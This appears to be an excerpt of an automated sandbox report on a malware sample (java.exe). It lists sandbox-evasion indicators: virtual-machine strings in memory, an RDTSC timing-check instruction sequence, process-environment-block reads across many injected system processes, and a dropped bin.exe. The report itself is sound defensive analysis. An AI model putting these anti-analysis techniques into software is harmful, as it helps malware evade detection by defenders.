            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 26720RANDOMSALADGAMESLLC.SIMPLEFREECELL_KX24DQMAZQK8J!APP{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\HYPERSNAP 6\HPRSNAP6.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\TRACKER\TRACKER.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MOBIRISE4\MOBIRISE.EXE{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DOMAIN.MSC{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\CEH-HOD\CEH.BATPP{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\SYNERGETIC\SYNERGY.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\MEDIAINFO\MEDIAINFO.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AEGISUB\AEGISUB32.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PUREVPN\PUREVPN.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\DBEAVER\DBEAVER.EXESAMSUNGELECTRONICSCOLTD.SAMSUNGNOTES_WYX1VJ98G3ASY!APP12009
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MOBIRISE4\MOBIRISE.EXE
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\HEIDISQL\HEIDISQL.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\GIMP 2\BIN\GIMP-2.10.EXE{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ODBCAD32.EXE8593E
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ESTSOFT\ALPDF\ALPDF.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\I4TOOLS7\I4TOOLS.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\CARS\APPS\BIN\CARS.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINSTEP\NEXUS.EXE11267
            Source: C:\Windows\SysWOW64\winver.exe RDTSC instruction interceptor: First address: 0000000003392FAD second address: 0000000003392FD6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 stosd 0x00000005 mov eax, dword ptr [ebx+004042B5h] 0x0000000b stosd 0x0000000c mov eax, dword ptr [ebx+004042B9h] 0x00000012 stosd 0x00000013 mov eax, dword ptr [ebx+00406820h] 0x00000019 stosd 0x0000001a mov eax, dword ptr [ebx+00406824h] 0x00000020 stosd 0x00000021 lea eax, dword ptr [ebp-00000700h] 0x00000027 sub edi, eax 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\java.exe Code function: 0_2_02230005 rdtsc 0_2_02230005
            Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 833
            Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 803
            Source: C:\Windows\SysWOW64\winver.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_2-2921
            Source: C:\Windows\SysWOW64\winver.exe TID: 7468 Thread sleep count: 167 > 30
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exe Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
            Source: C:\Windows\System32\ctfmon.exe Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: C:\Windows\System32\smartscreen.exe Last function: Thread delayed
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: C:\Windows\System32\ApplicationFrameHost.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
            Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe Last function: Thread delayed
            Source: svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
            Source: explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718266506.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2948940372.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft.Office.Excel_8wekyb3d8bbwe!microsoft.excel{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\RemotePC\RPCSuite.exeAirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App11496{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Vector Magic\vmde.exe{6D809377-6AF0-444B-8957-A3773F02200E}\vJoy\x64\vJoyConf.exe{6D809377-6AF0-444B-8957-A3773F02200E}\YoloMouse\YoloMouse.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ExitLag\ExitLag.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Jitsi\Jitsi.exeMAGIX.MusicMakerJam_a2t3txkz9j1jw!MAGIX.MusicMakerJam.App11626{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ASUS\Splendid\ACVT.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Pritunl\pritunl.exeMicrosoft.HoganThreshold_8wekyb3d8bbwe!xgame.App
            Source: explorer.exe, 00000003.00000000.1637129940.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1780931087.0000024B42D43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: SearchApp.exe, 0000000B.00000000.1781018037.0000024B42D64000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware.View.Client
            Source: winver.exe, 00000002.00000002.2893076976.0000000003287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware horizon client*|vm ware8394
            Source: explorer.exe, 00000003.00000000.1637129940.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: net\5.1.0*|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000000.1781018037.0000024B42D64000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware.View.Client12451
            Source: explorer.exe, 00000003.00000002.3031801494.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1883649123.0000024B5CBD7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware horizon client*|vmare7220\nero.exe
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|*|vmware6886
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|hyper-v manager*|vm4595
            Source: SearchApp.exe, 0000000B.00000003.1804124700.0000024B44464000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: |*|qemu10642
            Source: explorer.exe, 00000003.00000000.1636199688.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: SearchApp.exe, 0000000B.00000000.1855361847.0000024B55CC4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware.Horizon.Client
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware horizon client*|vmare7220
            Source: RuntimeBroker.exe, 0000000A.00000002.2923038092.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.1637129940.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware workstation 15 player*|vmplayer6438
            Source: explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !!!!!!!MKKSkSe*|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: E}\MediaHuman\A*|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|*|qemu10642
            Source: SearchApp.exe, 0000000B.00000000.1771919499.0000024B425C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1759250182.00000243411CA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|hyper-v manager*|hyperv4178
            Source: SearchApp.exe, 0000000B.00000000.1855361847.0000024B55CC4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware.Workstation.vmui
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|hyper-v manager*|virtual5441
            Source: explorer.exe, 00000003.00000000.1640106442.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r.exe
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A4*|vmware vsphere client*|vcenter5038
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: F-A0FB-4BFC-874*|vmware horizon client*|vmare7220
            Source: explorer.exe, 00000003.00000000.1640106442.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1754943527.000002433B786000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000002.3031801494.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000000.1637129940.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: l 2017\Petrel*|vmware horizon client*|vm ware8394
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|hyper-v manager*|hyper v4919
            Source: SearchApp.exe, 0000000B.00000000.1855361847.0000024B55CC4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware.Workstation.vmui218
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware horizon client*|view5503
            Source: svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Meld\Meld.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Sparx Systems\EA\EA.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MakeMKV\makemkv.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MirrorOp\MirrorOp.exeC:\Games\Counter-Strike WaRzOnE\CS16Launcher.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PDFBinder\PDFBinder.exe{6D809377-6AF0-444B-8957-A3773F02200E}\PureRef\PureRef.exeA97ECD55.KYOCERAPrintCenter_kqmhh0ktdt7dg!KYOCERAPrintCenter{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Meitu\XiuXiu\XiuXiu.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Zoiper5\Zoiper5.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MP3Gain\MP3GainGUI.exe{6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exeLenovoCorporation.LenovoSettings_4642shxvsv8s2!App10978
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Enterprise\Co*|vmware horizon client*|view5503
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware vsphere client*|vcenter5038
            Source: SearchApp.exe, 0000000B.00000003.1883649123.0000024B5CBD7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: *|vmware vsphere client*|vspe6388-4BFC-874A
            Source: explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 377*|vmware workstation 15 player*|vmplayer6438
            Source: C:\Users\user\Desktop\java.exe API call chain: ExitProcess graph end node graph_0-3090
            Source: C:\Windows\SysWOW64\winver.exe API call chain: ExitProcess graph end node graph_2-2656
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe API call chain: ExitProcess graph end node graph_13-5409
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe API call chain: ExitProcess graph end node graph_13-5528
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe API call chain: ExitProcess graph end node graph_13-5893
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe API call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\winver.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\java.exe Code function: 0_2_02230005 rdtsc 0_2_02230005
            Source: C:\Users\user\Desktop\java.exe Code function: 0_2_00401000 mov eax, dword ptr fs:[00000030h] 0_2_00401000
            Source: C:\Users\user\Desktop\java.exe Code function: 0_2_02230C63 mov eax, dword ptr fs:[00000030h] 0_2_02230C63
            Source: C:\Windows\SysWOW64\winver.exe Code function: 2_2_03390C3F mov eax, dword ptr fs:[00000030h] 2_2_03390C3F
            Source: C:\Windows\explorer.exe Code function: 3_2_01340C3F mov eax, dword ptr fs:[00000030h] 3_2_01340C3F
            Source: C:\Windows\explorer.exe Code function: 3_2_01370C3F mov eax, dword ptr fs:[00000030h] 3_2_01370C3F
            Source: C:\Windows\System32\sihost.exe Code function: 4_2_00AC0C3F mov eax, dword ptr fs:[00000030h] 4_2_00AC0C3F
            Source: C:\Windows\System32\svchost.exe Code function: 5_2_00910C3F mov eax, dword ptr fs:[00000030h] 5_2_00910C3F
            Source: C:\Windows\System32\svchost.exe Code function: 6_2_009A0C3F mov eax, dword ptr fs:[00000030h] 6_2_009A0C3F
            Source: C:\Windows\System32\ctfmon.exe Code function: 7_2_00A50C3F mov eax, dword ptr fs:[00000030h] 7_2_00A50C3F
            Source: C:\Windows\System32\svchost.exe Code function: 8_2_00D40C3F mov eax, dword ptr fs:[00000030h] 8_2_00D40C3F
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe Code function: 9_2_00B50C3F mov eax, dword ptr fs:[00000030h] 9_2_00B50C3F
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 10_2_00110C3F mov eax, dword ptr fs:[00000030h] 10_2_00110C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe Code function: 13_2_001C0C3F mov eax, dword ptr fs:[00000030h] 13_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe Code function: 13_2_02300C63 mov eax, dword ptr fs:[00000030h] 13_2_02300C63
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 15_2_00AB0C3F mov eax, dword ptr fs:[00000030h] 15_2_00AB0C3F
            Source: C:\Windows\System32\smartscreen.exe Code function: 16_2_00290C3F mov eax, dword ptr fs:[00000030h] 16_2_00290C3F
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe Code function: 19_2_00580C3F mov eax, dword ptr fs:[00000030h] 19_2_00580C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe Code function: 20_2_001C0C3F mov eax, dword ptr fs:[00000030h] 20_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe Code function: 20_2_022A0C63 mov eax, dword ptr fs:[00000030h] 20_2_022A0C63
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 22_2_003D0C3F mov eax, dword ptr fs:[00000030h] 22_2_003D0C3F
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 23_2_00900C3F mov eax, dword ptr fs:[00000030h] 23_2_00900C3F
            Source: C:\Windows\System32\ApplicationFrameHost.exe Code function: 24_2_00180C3F mov eax, dword ptr fs:[00000030h] 24_2_00180C3F
            Source: C:\Windows\System32\RuntimeBroker.exe Code function: 26_2_00190C3F mov eax, dword ptr fs:[00000030h] 26_2_00190C3F
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Code function: 28_2_00010C3F mov eax, dword ptr fs:[00000030h] 28_2_00010C3F
            Source: C:\Windows\System32\svchost.exe Code function: 29_2_000D0C3F mov eax, dword ptr fs:[00000030h] 29_2_000D0C3F
